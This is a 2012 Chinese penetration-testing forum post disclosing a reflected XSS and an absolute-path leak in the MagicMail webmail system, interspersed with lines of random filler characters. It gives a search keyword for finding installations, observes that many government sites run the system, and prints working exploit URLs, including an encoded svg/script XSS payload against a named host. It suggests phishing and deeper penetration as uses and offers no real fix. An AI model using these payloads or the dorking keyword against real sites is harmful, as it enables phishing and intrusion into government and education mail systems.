中国网络渗透测试联盟
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 20:38
标题:
MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
1 y8 F) Q( M! r' s- `8 k* I
: [1 i/ J/ ^' q9 j3 m
! l1 y# \ q5 I( d" h
包含 一个反射性XSS 以及 绝对路径泄漏
+ l5 Q, G2 z2 r. @& t1 F
看了看 貌似全部是linux的。
# ?$ K" F- y/ A! @. b
$ y: _1 k7 m, u% }* U, Y
关键字:迈捷邮件系统 by MagicMail
" A6 ]0 Y+ ]" X
: V! L0 j3 S" l- s" U
可以看到很多政府网站都用这个邮件系统
5 t) c: r+ Z( j# T4 S
o: ?6 z' ^8 R# ]" |
绝对路径
http://madman.in/index.php?login_type=declare&language=
# W: F4 `* O& z' e
" i6 ?6 J9 |/ g( h& \- I
6 `3 z+ x a) O/ {0 {
3 z; I/ A0 @0 |; H3 A# j$ _
XSS:
http://madman.in/index.php?login_type=declare&language=
–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
" Q- l' A' I$ r/ |3 q y
# F: L/ y2 J* w% H/ {5 e+ |' s
' j, t! y1 e9 x! j
! n# p- w$ ~' ]4 L2 o: v
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
( |8 r; `% z4 J% Q% R
7 q3 s% l" h* l4 [# E) o3 P3 u; z: {
修复方案:看官方补丁吧。
% G. X+ F) V3 v! Z* _- K; a( K
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2